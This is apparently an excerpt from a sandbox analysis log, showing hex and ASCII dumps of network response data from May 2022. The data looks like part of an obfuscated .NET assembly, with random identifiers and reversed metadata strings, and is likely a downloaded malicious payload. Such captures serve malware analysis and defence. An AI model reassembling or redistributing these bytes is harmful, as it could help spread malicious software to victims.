02 00 09 bd 80 12 0e 02 07 06 bd 80 12 bd 80 12 01 02 00 09 05 1d 6c 84 12 68 84 12 61 81 12 08 08 05 1d 1c 6c 84 12 68 84 12 61 81 12 08 bd 80 12 0d 07 1f 02 c8 85 11 bd 80 12 02 71 81 12 15 02 07
                                                                                  Data Ascii: )0e e0ppp== lhalhaq
                                                                                  2022-05-02 11:03:15 UTC2799INData Raw: 00 28 05 74 81 12 00 28 05 08 00 28 03 e8 81 12 00 00 05 0e 1d 01 01 20 05 0e 1d 00 20 04 34 83 11 01 01 20 06 34 83 11 00 20 05 60 82 12 01 01 20 06 60 82 12 00 20 05 44 83 12 01 01 20 06 44 83 12 00 20 05 74 81 12 01 01 20 06 74 81 12 00 20 05 e8 81 12 06 04 34 83 11 06 04 60 82 12 06 04 44 83 12 06 04 e4 81 12 00 00 05 e4 81 12 06 04 e0 81 12 00 00 05 29 81 12 0e 02 07 06 0e 29 81 12 01 00 06 e0 81 12 06 04 dc 81 12 00 00 05 ad 82 11 01 01 20 06 a9 82 11 02 01 20 06 a1 82 12 01 01 20 06 a1 82 12 00 00 05 02 02 0e 03 07 05 02 02 02 03 07 05 25 81 12 00 20 05 59 82 12 02 02 07 06 59 82 12 00 00 05 dc 81 12 06 04 59 82 12 06 04 d8 81 12 00 00 05 02 02 08 02 0e 0e 06 07 08 d8 81 12 06 04 d4 81 12 00 00 05 05 1d 99 82 12 61 81 12 61 81 12 04 07 0d d4 81 12
                                                                                  Data Ascii: (t(( 4 4 ` ` D D t t 4`D)) % YYYaa
                                                                                  2022-05-02 11:03:15 UTC2815INData Raw: 45 76 56 33 48 00 4e 72 4b 43 75 37 76 73 53 44 00 70 56 51 59 36 36 76 32 6d 43 00 5a 53 30 43 48 32 76 47 56 67 00 6c 68 36 33 72 72 76 55 55 69 00 55 59 58 52 48 69 76 70 68 59 00 72 4e 6f 61 75 57 76 59 56 41 00 67 70 69 42 50 7a 58 66 65 70 00 68 4b 68 50 6b 75 58 39 62 6a 00 55 65 69 53 64 53 58 41 35 71 00 4e 32 72 77 63 56 58 6f 48 58 00 62 56 77 76 33 54 58 69 4a 42 00 52 62 42 6d 65 34 58 44 67 54 00 68 46 78 6e 36 79 58 45 42 56 00 66 35 48 4f 45 63 58 71 76 4c 00 4f 4c 53 58 65 6e 58 6d 5a 44 00 75 54 49 45 38 62 58 75 68 63 00 65 70 61 56 77 76 58 46 56 68 00 33 72 33 75 71 74 58 74 76 69 00 62 51 34 41 6a 65 58 63 38 64 00 56 56 44 48 46 66 58 36 58 56 00 69 70 49 6b 6e 71 58 62 74 50 00 36 54 6b 70 53 5a 58 31 70 69 00 4b 5a 37 44 50 50 58
                                                                                  Data Ascii: EvV3HNrKCu7vsSDpVQY66v2mCZS0CH2vGVglh63rrvUUiUYXRHivphYrNoauWvYVAgpiBPzXfephKhPkuX9bjUeiSdSXA5qN2rwcVXoHXbVwv3TXiJBRbBme4XDgThFxn6yXEBVf5HOEcXqvLOLSXenXmZDuTIE8bXuhcepaVwvXFVh3r3uqtXtvibQ4AjeXc8dVVDHFfX6XVipIknqXbtP6TkpSZX1piKZ7DPPX
                                                                                  2022-05-02 11:03:15 UTC2831INData Raw: 65 6c 00 76 61 6e 58 37 31 55 70 6a 6a 00 6b 77 46 77 51 34 55 4c 39 77 00 47 58 48 39 39 6d 55 31 6d 6b 00 64 51 77 75 4d 79 55 57 66 4f 00 4c 36 46 71 67 4a 55 6a 4f 43 00 39 31 52 36 43 63 55 56 77 71 00 6f 49 43 67 4c 43 55 77 36 41 00 31 47 6b 36 4b 6e 55 71 74 65 00 6e 77 68 43 77 48 55 54 44 4f 00 41 42 67 6c 4c 62 55 36 73 57 00 41 34 45 39 76 49 55 57 5a 71 00 63 43 79 6e 35 76 55 34 77 76 00 4c 44 56 53 51 58 55 6e 4f 68 00 52 69 37 69 37 74 55 72 69 4e 00 49 49 4e 72 46 77 55 74 56 55 00 47 5a 53 6a 61 65 55 41 53 51 00 77 77 4e 76 32 6b 55 71 48 55 00 4b 77 50 74 6a 66 55 5a 32 78 00 48 45 36 37 36 41 55 79 58 79 00 6e 66 50 59 77 71 55 6b 6e 70 00 48 63 78 70 47 39 55 74 61 4f 00 38 6d 59 65 42 5a 55 74 76 6b 00 71 30 78 70 74 4f 55 38 62 79
                                                                                  Data Ascii: elvanX71UpjjkwFwQ4UL9wGXH99mU1mkdQwuMyUWfOL6FqgJUjOC91R6CcUVwqoICgLCUw6A1Gk6KnUqtenwhCwHUTDOABglLbU6sWA4E9vIUWZqcCyn5vU4wvLDVSQXUnOhRi7i7tUriNIINrFwUtVUGZSjaeUASQwwNv2kUqHUKwPtjfUZ2xHE676AUyXynfPYwqUknpHcxpG9UtaO8mYeBZUtvkq0xptOU8by
                                                                                  2022-05-02 11:03:15 UTC2847INData Raw: 61 00 42 52 57 32 66 39 79 62 54 68 76 35 37 57 6a 67 57 6e 52 68 00 64 61 65 68 00 4f 74 57 52 59 30 64 6e 6d 4b 00 6d 65 74 49 00 77 78 73 58 64 76 47 78 6b 4b 6a 72 37 57 6a 48 48 73 6d 74 00 6f 32 76 4b 76 4b 33 74 77 57 57 44 37 57 33 58 73 47 76 75 00 74 73 61 4c 65 76 6f 6d 65 52 00 46 6b 41 66 35 58 57 72 34 77 34 69 37 57 59 78 4c 6f 53 54 00 4f 56 32 63 44 6b 46 4a 6b 73 52 38 51 57 47 39 61 57 56 50 00 32 6d 57 4c 37 42 45 52 31 30 42 53 51 57 68 57 43 42 6c 4e 00 76 76 51 6c 37 77 35 4f 6f 71 5a 59 51 57 63 76 31 44 39 62 00 6f 79 52 6f 70 51 37 44 51 4a 00 74 65 67 72 61 54 00 65 70 79 54 65 74 75 62 69 72 74 74 41 00 34 32 73 4c 48 6c 58 69 6f 6f 48 4c 37 57 6f 55 5a 59 30 4f 00 53 57 76 75 67 34 73 77 6c 54 78 57 37 57 4d 6d 34 6b 57 54 00
                                                                                  Data Ascii: aBRW2f9ybThv57WjgWnRhdaehOtWRY0dnmKmetIwxsXdvGxkKjr7WjHHsmto2vKvK3twWWD7W3XsGvutsaLevomeRFkAf5XWr4w4i7WYxLoSTOV2cDkFJksR8QWG9aWVP2mWL7BER10BSQWhWCBlNvvQl7w5OoqZYQWcv1D9boyRopQ7DQJtegraTepyTetubirttA42sLHlXiooHL7WoUZY0OSWvug4swlTxW7WMm4kWT
                                                                                  2022-05-02 11:03:15 UTC2863INData Raw: 53 00 67 70 34 6d 36 51 74 54 79 48 51 77 51 57 74 54 54 75 33 41 00 31 70 61 72 77 5f 5f 37 3e 3c 00 6e 6f 74 65 6c 67 6e 69 73 00 64 49 64 61 65 72 68 54 6c 61 69 74 69 6e 69 5f 5f 6c 3e 3c 00 74 6e 65 72 72 75 63 5f 5f 32 3e 3c 00 65 74 61 74 73 5f 5f 31 3e 3c 00 49 5a 39 4e 6f 37 69 67 39 76 61 50 35 57 6c 66 41 38 67 64 00 72 34 57 64 68 38 6c 34 4a 75 35 78 35 57 32 38 38 63 5a 4e 00 65 75 6c 61 56 64 6e 65 74 78 45 64 6e 65 70 70 41 00 67 61 54 64 65 6e 69 66 65 44 77 6f 6c 6c 61 5f 5f 33 3e 3c 00 6e 6f 74 65 6c 67 6e 69 73 5f 5f 33 3e 3c 00 74 61 6d 72 6f 66 5f 5f 33 3e 3c 00 67 61 74 5f 5f 33 3e 3c 00 65 63 6e 61 74 73 6e 69 5f 5f 33 3e 3c 00 73 65 75 6c 61 56 64 65 64 6e 65 74 78 45 74 65 47 00 32 38 6b 49 75 66 79 33 38 34 64 68 35 57 4d 33 72
                                                                                  Data Ascii: Sgp4m6QtTyHQwQWtTTu3A1parw__7><notelgnisdIdaerhTlaitini__l><tnerruc__2><etats__1><IZ9No7ig9vaP5WlfA8gdr4Wdh8l4Ju5x5W288cZNeulaVdnetxEdneppAgaTdenifeDwolla__3><notelgnis__3><tamrof__3><gat__3><ecnatsni__3><seulaVdednetxEteG28kIufy384dh5WM3r
                                                                                  2022-05-02 11:03:15 UTC2879INData Raw: 45 4d 43 76 74 67 59 00 79 6c 62 6d 65 73 73 41 67 6e 69 74 73 65 75 71 65 52 5f 74 65 67 00 73 67 72 41 74 6e 65 76 45 65 76 6c 6f 73 65 52 00 71 62 74 45 67 58 43 68 69 00 65 76 6c 6f 73 65 52 65 63 72 75 6f 73 65 52 5f 64 64 61 00 72 65 6c 64 6e 61 48 74 6e 65 76 45 65 76 6c 6f 73 65 52 00 79 6c 62 6d 65 73 73 41 5f 74 65 67 00 4b 68 54 4a 4d 64 4d 65 6a 6d 58 6f 75 54 36 38 4a 70 65 00 44 6e 35 64 4a 6e 75 4a 42 00 32 60 79 72 61 6e 6f 69 74 63 69 44 00 65 6c 69 74 61 6c 6f 56 73 49 00 34 36 31 56 6b 48 50 43 72 00 67 55 52 6d 4c 62 55 71 73 00 45 42 52 57 55 58 47 35 6a 64 32 4e 75 72 6d 6c 44 50 42 00 65 64 6a 32 32 78 6e 50 6c 78 36 6a 75 77 32 79 77 6d 55 00 65 7a 69 6c 61 69 72 65 53 00 65 7a 69 6c 61 69 72 65 73 65 44 00 34 36 74 6e 49 00 6e 6f
                                                                                  Data Ascii: EMCvtgYylbmessAgnitseuqeR_tegsgrAtnevEevloseRqbtEgXChievloseRecruoseR_ddareldnaHtnevEevloseRylbmessA_tegKhTJMdMejmXouT68JpeDn5dJnuJB2`yranoitciDelitaloVsI461VkHPCrgURmLbUqsEBRWUXG5jd2NurmlDPBedj22xnPlx6juw2ywmUezilaireSezilaireseD46tnIno
                                                                                  2022-05-02 11:03:15 UTC2895INData Raw: 48 58 56 64 4a 74 5a 33 78 4a 6a 00 31 45 4d 37 4a 4a 65 42 69 77 66 35 4a 55 34 36 59 63 6f 00 52 43 78 50 64 67 37 34 4f 76 4f 44 4a 61 77 68 30 50 4a 00 72 55 36 41 68 6e 78 31 36 4d 58 4c 4a 4c 39 5a 73 56 48 00 71 63 38 4e 70 61 30 69 68 31 48 33 4a 30 50 37 57 37 62 00 45 69 66 43 66 35 54 32 38 74 54 42 63 51 77 72 66 4a 57 00 42 41 33 6a 68 4f 78 42 67 44 75 38 63 44 42 57 4d 37 58 00 62 79 5a 55 65 64 6d 35 31 43 47 59 63 74 32 6a 58 74 55 00 39 55 4c 58 4c 68 73 6e 6c 39 51 52 63 6d 33 68 39 47 52 00 68 30 6e 54 70 73 67 4e 71 50 4a 31 63 58 41 43 70 48 54 00 42 47 41 6c 70 33 61 34 46 52 67 6d 63 32 43 61 57 68 51 00 50 36 4b 57 31 65 6a 59 45 77 6f 4a 63 6b 78 47 48 6f 4c 00 37 43 41 31 55 4d 77 61 48 71 64 43 63 43 47 75 6b 68 50 00 50 5a 31
                                                                                  Data Ascii: HXVdJtZ3xJj1EM7JJeBiwf5JU46YcoRCxPdg74OvODJawh0PJrU6Ahnx16MXLJL9ZsVHqc8Npa0ih1H3J0P7W7bEifCf5T28tTBcQwrfJWBA3jhOxBgDu8cDBWM7XbyZUedm51CGYct2jXtU9ULXLhsnl9QRcm3h9GRh0nTpsgNqPJ1cXACpHTBGAlp3a4FRgmc2CaWhQP6KW1ejYEwoJckxGHoL7CA1UMwaHqdCcCGukhPPZ1
                                                                                  2022-05-02 11:03:15 UTC2911INData Raw: 30 2d 32 33 32 38 2d 39 61 34 34 2d 61 37 37 66 2d 39 36 63 64 31 33 64 30 7b 3e 65 6c 75 64 6f 4d 3c 00 36 35 32 3d 65 7a 69 53 65 70 79 54 74 69 6e 49 79 61 72 72 41 63 69 74 61 74 53 5f 5f 00 34 36 3d 65 7a 69 53 65 70 79 54 74 69 6e 49 79 61 72 72 41 63 69 74 61 74 53 5f 5f 00 30 34 3d 65 7a 69 53 65 70 79 54 74 69 6e 49 79 61 72 72 41 63 69 74 61 74 53 5f 5f 00 32 33 3d 65 7a 69 53 65 70 79 54 74 69 6e 49 79 61 72 72 41 63 69 74 61 74 53 5f 5f 00 30 33 3d 65 7a 69 53 65 70 79 54 74 69 6e 49 79 61 72 72 41 63 69 74 61 74 53 5f 5f 00 38 31 3d 65 7a 69 53 65 70 79 54 74 69 6e 49 79 61 72 72 41 63 69 74 61 74 53 5f 5f 00 36 31 3d 65 7a 69 53 65 70 79 54 74 69 6e 49 79 61 72 72 41 63 69 74 61 74 53 5f 5f 00 7d 36 31 38 43 39 30 33 45 46 38 46 45 2d 31 30
                                                                                  Data Ascii: 0-2328-9a44-a77f-96cd13d0{>eludoM<652=eziSepyTtinIyarrAcitatS__46=eziSepyTtinIyarrAcitatS__04=eziSepyTtinIyarrAcitatS__23=eziSepyTtinIyarrAcitatS__03=eziSepyTtinIyarrAcitatS__81=eziSepyTtinIyarrAcitatS__61=eziSepyTtinIyarrAcitatS__}618C903EF8FE-10
                                                                                  2022-05-02 11:03:15 UTC2927INData Raw: 11 a9 11 93 11 64 11 37 10 f7 10 cc 10 a7 0f e4 0f c4 0f a4 0f 98 0f 61 0f 4c 0f 17 0e d7 0e 84 0e 6a 0e 11 0d e6 0d a1 0d 4e 0d 41 0d 32 0c e8 0c a4 04 a1 03 94 03 68 03 5f 03 51 03 4c 03 2e 02 fc 02 f4 07 4c 00 00 00 00 07 4b 00 00 00 00 07 4a 00 00 00 00 07 49 00 00 00 00 07 48 00 00 00 00 07 47 00 00 00 00 07 46 00 00 00 00 07 45 00 00 00 00 07 41 00 00 00 00 07 40 00 00 00 00 07 3f 00 00 00 00 07 3e 00 00 00 00 07 3d 00 00 00 00 07 3c 00 00 00 00 04 f1 00 00 00 08 04 f0 00 00 00 04 04 ef 00 00 00 04 04 ee 00 00 00 04 04 ed 00 00 00 04 04 ec 00 00 00 00 04 ea 00 00 00 04 04 e9 00 00 00 04 04 e8 00 00 00 04 04 e7 00 00 00 04 04 e6 00 00 00 00 04 e4 00 00 00 10 04 e3 00 00 00 08 04 e2 00 00 00 08 04 e1 00 00 00 08 04 e0 00 00 00 08 04 df 00 00 00 08 04
                                                                                  Data Ascii: d7aLjNA2h_QL.LKJIHGFEA@?>=<
                                                                                  2022-05-02 11:03:15 UTC2943INData Raw: 04 80 00 00 a2 0e 00 00 00 39 00 d7 00 00 00 62 00 00 03 d1 12 55 00 00 9a 46 00 00 00 39 12 40 00 00 a1 88 00 00 03 99 03 1c 00 00 94 e4 00 00 00 4c 04 80 00 00 a0 e3 00 00 00 39 0e 63 00 00 a0 da 00 00 02 79 0e ac 00 00 93 53 00 00 00 44 0e 7b 00 00 98 b3 00 00 00 44 11 fd 00 00 a0 cb 00 00 03 89 11 f7 00 00 a0 c2 00 00 03 81 11 ed 00 00 71 47 00 00 00 3c 04 4a 00 00 a0 8c 00 00 03 b1 11 a3 00 00 75 f3 00 00 03 a1 00 d7 00 00 00 62 00 00 03 99 11 84 00 00 a0 06 00 00 01 89 11 7b 00 00 9f fc 00 00 03 81 11 75 00 00 9f eb 00 00 03 89 11 6f 00 00 9f db 00 00 00 39 11 69 00 00 9f d2 00 00 03 81 11 45 00 00 9c 64 00 00 00 39 02 f0 00 00 9f 48 00 00 02 51 11 06 00 00 9f 42 00 00 01 01 11 1e 00 00 9e d3 00 00 03 61 11 11 00 00 9e a1 00 00 02 51 11 06 00 00 9e
                                                                                  Data Ascii: 9bUF9@L9cySD{DqG<Jub{uo9iEd9HQBaQ
                                                                                  2022-05-02 11:03:15 UTC2959INData Raw: 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 06 00 00 00 00 71 05 00 05 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 06 00 00 00 00 71 05 00 05 00 00 00 00 71 05 00 04 00 00 00 00 71 05 00 03 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 02 00 00 00 00 f0 54 00 03 00 00 00 01 18 af 00 02 00 00 00 00 f0 54 00 03 00 00 00 01 18 af 00 02 00 00 00 00 ec 9f 00 02 00 00 00 00 ec 9f 00 02 00 00 00 00 cd bb 00 02 00 00 00 00 ec b4 00 01 00 00 00 00 cd bb 00 02 00 00 00 00 ec b4 00 01 00 00 00 00 cd bb 00 03 00 00 00 00 cd e7 00
                                                                                  Data Ascii: qqqqqqqqqqqqqqqqqqqqTT
                                                                                  2022-05-02 11:03:15 UTC2975INData Raw: 00 00 00 00 cd 31 00 03 00 00 00 00 cd e7 00 02 00 00 00 00 cd bb 00 01 00 00 00 00 f3 b9 00 05 00 00 00 00 f0 5b 00 04 00 00 00 00 cd 31 00 03 00 00 00 00 cd e7 00 02 00 00 00 00 cd bb 00 01 00 00 00 00 f3 b9 00 05 00 00 00 00 f0 5b 00 04 00 00 00 00 cd 31 00 03 00 00 00 00 cd e7 00 02 00 00 00 00 cd bb 00 01 00 00 00 00 f0 5b 00 04 00 00 00 00 cd 31 00 03 00 00 00 00 cd e7 00 02 00 00 00 00 cd bb 00 01 00 00 00 00 f0 5b 00 04 00 00 00 00 cd 31 00 03 00 00 00 00 cd e7 00 02 00 00 00 00 cd bb 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 f3 b9 00 04 00 00 00 00 cd 31 00 03 00 00 00 00 cd e7 00 02 00 00 00 00 cd bb 00 01 00 00 00 00 cd 31 00 03 00 00 00 00 cd e7 00 02 00 00 00 00 cd bb 00 01 00 00 00 00 71 05 00 06 00 00 00 00 71 05 00
                                                                                  Data Ascii: 1[1[1[1[1qq11qq
                                                                                  2022-05-02 11:03:15 UTC2991INData Raw: 00 00 00 00 03 6e 00 05 00 00 00 00 03 70 00 04 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1 00 01 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 03 70 00 04 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1 00 01 00 00 00 00 03 d2 00 07 00 00 00 00 03 b7 00 06 00 00 00 00 03 6e 00 05 00 00 00 00 03 70 00 04 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1 00 01 00 00 00 00 03 6e 00 05 00 00 00 00 03 70 00 04 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1 00 01 00 00 00 00 71 05 00 02 00 00 00 00 71 05 00 01 00 00 00 00 02 dc 00 03 00 00 00 00 02 da 00 02 00 00 00 00 02 d1 00 01 00 00 00 00 03 ad 00
                                                                                  Data Ascii: npqqpnpnpqq
                                                                                  2022-05-02 11:03:15 UTC3007INData Raw: 88 8c 1a 91 30 ca 00 00 75 59 00 46 00 03 00 00 00 00 1a 91 02 d4 00 00 70 51 18 10 00 00 00 07 88 78 1a 91 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a 91 c0 c0 00 01 7e c2 00 16 00 00 00 07 88 64 1a 91 30 ca 00 00 75 59 00 46 00 03 00 00 00 00 1a 91 02 d4 00 00 70 51 18 10 00 00 00 07 88 50 1a 91 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a 8f c0 ad 00 01 7e c2 00 16 00 00 00 07 88 38 1a 8d c0 a2 00 00 75 59 00 46 00 03 00 00 00 00 1a 8d 02 d4 00 00 70 51 18 10 00 00 00 07 88 24 1a 8d 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a 8c c0 94 00 01 7e c2 00 16 00 00 00 07 88 10 1a 8b a6 c3 00 00 75 59 00 46 00 03 00 00 00 00 1a 8b 02 d4 00 00 70 51 18 10 00 00 00 07 87 fc 1a 8b 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 1a 8a c0 84 00 01 7e c2 00 16 00 00 00
                                                                                  Data Ascii: 0uYFpQxLb~d0uYFpQPLb~8uYFpQ$Lb~uYFpQLb~
                                                                                  2022-05-02 11:03:15 UTC3023INData Raw: 5e 74 17 ed a6 c3 00 00 75 59 00 46 00 03 00 00 00 00 17 ed 02 d4 00 00 70 51 18 10 00 00 00 07 5e 60 17 ed 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 17 eb ac 39 00 01 7e c2 00 16 00 00 00 07 5e 4c 17 e9 ac 2f 00 00 75 59 00 46 00 03 00 00 00 00 17 e9 02 d4 00 00 70 51 18 10 00 00 00 07 5e 38 17 e9 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 17 e5 ac 1c 00 01 7e c2 00 16 00 00 00 07 5e 20 17 e1 ac 11 00 00 75 59 00 46 00 03 00 00 00 00 17 e1 02 d4 00 00 70 51 18 10 00 00 00 07 5e 0c 17 e1 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 17 de ab fd 00 01 7e c2 00 16 00 00 00 07 5d f4 17 db ab f1 00 00 75 59 00 46 00 03 00 00 00 00 17 db 02 d4 00 00 70 51 18 10 00 00 00 07 5d e0 17 db 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 17 d8 ab df 00 01 7e c2 00 16 00 00 00
                                                                                  Data Ascii: ^tuYFpQ^`Lb9~^L/uYFpQ^8Lb~^ uYFpQ^Lb~]uYFpQ]Lb~
                                                                                  2022-05-02 11:03:15 UTC3039INData Raw: 34 90 14 ed 95 c5 00 00 75 59 00 46 00 03 00 00 00 00 14 ed 02 d4 00 00 70 51 18 10 00 00 00 07 34 7c 14 ed 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 14 ed 95 b8 00 01 7e c2 00 16 00 00 00 07 34 68 14 ed 30 ca 00 00 75 59 00 46 00 03 00 00 00 00 14 ed 02 d4 00 00 70 51 18 10 00 00 00 07 34 54 14 ed 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 14 eb 95 a5 00 01 7e c2 00 16 00 00 00 07 34 3c 14 e9 95 9a 00 00 75 59 00 46 00 03 00 00 00 00 14 e9 02 d4 00 00 70 51 18 10 00 00 00 07 34 28 14 e9 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 14 e9 95 8b 00 01 7e c2 00 16 00 00 00 07 34 14 14 e9 91 e4 00 00 75 59 00 46 00 03 00 00 00 00 14 e9 02 d4 00 00 70 51 18 10 00 00 00 07 34 00 14 e9 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 14 e7 95 79 00 01 7e c2 00 16 00 00 00
                                                                                  Data Ascii: 4uYFpQ4|Lb~4h0uYFpQ4TLb~4<uYFpQ4(Lb~4uYFpQ4Lby~
                                                                                  2022-05-02 11:03:15 UTC3055INData Raw: 0b 3c 12 21 7f f0 00 00 75 59 00 46 00 03 00 00 00 00 12 21 02 d4 00 00 70 51 18 10 00 00 00 07 0b 28 12 21 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 12 1e 7f dd 00 01 7e c2 00 16 00 00 00 07 0b 10 12 1b 7f d2 00 00 75 59 00 46 00 03 00 00 00 00 12 1b 02 d4 00 00 70 51 18 10 00 00 00 07 0a fc 12 1b 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 12 19 7f c0 00 01 7e c2 00 16 00 00 00 07 0a e8 12 17 7f b6 00 00 75 59 00 46 00 03 00 00 00 00 12 17 02 d4 00 00 70 51 18 10 00 00 00 07 0a d4 12 17 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 12 17 7f a7 00 01 7e c2 00 16 00 00 00 07 0a c0 12 17 7f a0 00 00 75 59 00 46 00 03 00 00 00 00 12 17 02 d4 00 00 70 51 18 10 00 00 00 07 0a ac 12 17 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 12 16 7f 93 00 01 7e c2 00 16 00 00 00
                                                                                  Data Ascii: <!uYF!pQ(!Lb~uYFpQLb~uYFpQLb~uYFpQLb~
                                                                                  2022-05-02 11:03:15 UTC3058INData Raw: 00 00 00 11 f1 02 d4 00 00 70 51 18 10 00 00 00 07 04 5c 11 f1 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 11 f1 7d 04 00 01 7e c2 00 16 00 00 00 07 04 48 11 f1 70 ae 00 00 75 59 00 46 00 03 00 00 00 00 11 f1 02 d4 00 00 70 51 18 10 00 00 00 07 04 34 11 f1 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 11 f1 7c f7 00 01 7e c2 00 16 00 00 00 07 04 20 11 f1 70 ae 00 00 75 59 00 46 00 03 00 00 00 00 11 f1 02 d4 00 00 70 51 18 10 00 00 00 07 04 0c 11 f1 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 11 f1 7c ea 00 01 7e c2 00 16 00 00 00 07 03 f8 11 f1 39 8f 00 00 75 59 00 46 00 03 00 00 00 00 11 f1 02 d4 00 00 70 51 18 10 00 00 00 07 03 e4 11 f1 0e 4c 00 00 00 62 18 06 00 03 00 00 00 00 11 f1 7c dd 00 01 7e c2 00 16 00 00 00 07 03 d0 11 f1 36 6f 00 00 75 59 00 46 00 03
                                                                                  Data Ascii: pQ\Lb}~HpuYFpQ4Lb|~ puYFpQLb|~9uYFpQLb|~6ouYF
                                                                                  2022-05-02 11:03:15 UTC3074INData Raw: 06 26 50 0f 81 0d 1c 00 01 5f e1 02 c3 00 00 00 06 26 40 0f 7f 69 d7 00 00 00 62 18 86 00 00 00 06 25 ec 0f 7f 69 c7 00 01 60 61 00 93 00 00 00 06 25 dc 0f 7f 02 d8 00 01 60 4c 00 93 00 00 00 06 25 c8 0f 7f 02 d4 00 00 70 51 18 91 00 00 00 06 25 b4 0f 7f 02 f8 00 01 57 43 02 c3 00 00 00 06 25 94 0f 7e 68 c4 00 01 5a 24 02 c3 00 00 00 06 25 38 0f 7d 68 c4 00 01 5a 0e 02 c3 00 00 00 06 24 d8 0f 7d 02 f8 00 01 5a 03 02 c3 00 00 00 06 24 b8 0f 7d 68 b5 00 01 59 f8 02 c3 00 00 00 06 24 60 0f 7c 68 8f 00 01 57 22 02 c3 00 00 00 06 24 10 0f 7b 68 51 00 01 5f ec 02 c3 00 00 00 06 23 ec 0f 7b 0d 1c 00 01 5f e1 02 c3 00 00 00 06 23 dc 0f 7a 68 51 00 01 56 eb 02 c3 00 00 00 06 23 c0 0f 79 68 51 00 01 56 e0 02 c3 00 00 00 06 22 a4 0f 77 69 b5 00 00 00 62 18 86 00 00
                                                                                  Data Ascii: &P_&@ib%i`a%`L%pQ%WC%~hZ$%8}hZ$}Z$}hY$`|hW"${hQ_#{_#zhQV#yhQV"wib
                                                                                  2022-05-02 11:03:15 UTC3090INData Raw: 04 60 c4 0c 25 59 57 00 01 34 05 00 81 00 00 00 04 5f f8 0c 1e 59 2e 00 01 33 eb 00 83 00 00 00 04 5a 68 0c 1a 59 1c 00 01 33 e0 00 81 00 00 00 04 59 38 0c 18 59 12 00 01 33 d8 01 c5 00 00 00 04 59 2c 0c 17 59 09 00 01 33 d8 00 85 00 00 00 04 59 14 0c 17 02 f8 00 01 26 1c 01 c5 00 00 00 04 59 08 0c 17 02 d4 00 00 70 51 18 91 00 00 00 04 58 f4 0c 16 1b 73 00 00 ae 04 01 c6 00 03 00 00 00 00 0c 12 58 e9 00 00 ad dd 01 c6 00 03 00 00 00 00 0c 10 58 e1 00 00 75 59 01 c6 00 03 00 00 00 00 0c 0e 0e 4c 00 00 00 62 18 86 00 03 00 00 00 00 0c 0e 58 db 00 01 33 7f 00 93 00 00 00 04 58 e4 0c 0e 02 d8 00 01 33 6a 00 93 00 00 00 04 58 d0 0c 0e 02 d4 00 00 70 51 18 91 00 00 00 04 58 bc 0c 0d 36 a2 00 00 00 62 18 83 00 00 00 04 58 48 0c 0c 00 e1 00 00 00 62 18 83 00 00
                                                                                  Data Ascii: `%YW4_Y.3ZhY3Y8Y3Y,Y3Y&YpQXsXXuYLbX3X3jXpQX6bXHb
                                                                                  2022-05-02 11:03:15 UTC3106INData Raw: 02 37 1c 07 ee 00 b3 00 00 00 62 18 83 00 00 00 02 36 f4 07 ee 02 d4 00 00 70 51 18 91 00 00 00 05 0b b0 07 ed 3d ae 00 00 ae 04 01 c6 00 03 00 00 00 00 07 ea 16 90 00 00 ad dd 01 c6 00 03 00 00 00 00 07 e9 3d a7 00 00 75 59 01 c6 00 03 00 00 00 00 07 e7 0e 4c 00 00 00 62 18 86 00 03 00 00 00 00 07 e7 3d 9d 00 00 f5 f0 00 93 00 00 00 05 0b a0 07 e7 02 d8 00 00 f5 db 00 93 00 00 00 05 0b 8c 07 e7 02 d4 00 00 70 51 18 91 00 00 00 05 0b 78 07 e6 34 28 00 00 e1 e6 08 96 00 00 00 05 0b 50 07 e6 02 d8 00 00 e1 d1 08 96 00 00 00 05 0b 30 07 e6 3d 92 00 00 f5 b1 00 93 00 00 00 05 0b 20 07 e6 02 d8 00 00 f5 9c 00 93 00 00 00 05 0b 0c 07 e6 02 d4 00 00 70 51 18 91 00 00 00 05 0a f8 07 e5 3d 8b 00 00 f4 4d 00 96 00 00 00 05 0a a4 07 e4 34 9c 00 00 f5 8f 00 96 00 00
                                                                                  Data Ascii: 7b6pQ==uYLb=pQx4(P0= pQ=M4
